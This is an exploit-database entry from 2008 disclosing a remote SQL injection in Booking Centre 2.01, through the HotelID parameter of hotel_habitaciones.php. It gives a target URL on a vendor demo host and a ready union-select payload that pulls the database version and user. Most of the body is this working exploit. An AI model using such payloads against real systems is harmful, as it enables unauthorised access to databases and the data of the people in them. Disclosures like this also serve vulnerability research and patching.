Booking Centre 2.01 (HotelID) Remote SQL Injection Vulnerability

2008-11-27T00:00:00
ID 1337DAY-ID-4278
Type zdt
Reporter R3d-D3v!L
Modified 2008-11-27T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
Booking Centre 2.01 (HotelID) Remote SQL Injection Vulnerability
================================================================


 [~] ----------------------------------------------------------
 [~]Tybe: (hotel_habitaciones.php HotelID) Remote SQL Injection Vulnerability
  
 [~]Vendor: www.bookingcentre.eu
  
 [~]Software: Hotels Group
  
 [~] Date: 28.11.2008 
  
 [~] Home: www.ahacker.biz 
  
 [~] contact: N/A 
 [~] ----------------------------------------------------------- 
  

 [~] Exploit: 

 http://demo.hotelsadmin.com/www_en/hotel_habitaciones.php?HotelID=(SQL)


 [~] (SQL): 

 1+union+select+concat_ws(0x3a,@@version,0x3a,user())--
  
 [~]-------------------------------------------------------------------------------- 




#  0day.today [2018-03-09]  #